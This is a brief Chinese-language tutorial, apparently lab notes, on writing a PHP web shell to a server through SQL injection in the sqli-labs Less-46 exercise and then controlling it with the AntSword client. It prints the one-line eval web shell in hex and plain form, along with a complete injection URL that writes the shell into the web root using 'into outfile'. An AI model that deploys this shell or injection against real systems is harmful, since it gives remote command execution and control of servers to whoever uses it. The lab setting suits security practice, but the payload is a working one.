找到mysql配置文件

secure-file-priv=

工作目錄

D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重點是tool目錄后面 前面大家可能都不一樣

添加數據

一句話木馬

3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻譯過來
<?php eval($_POST["cmd"]);?>

示例天書第46關上傳木馬

/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

選擇你上傳一句話木馬的url地址 具體到 你上傳的文件名

這個參數就是連接密碼

完成操作后 可以操作對方的目錄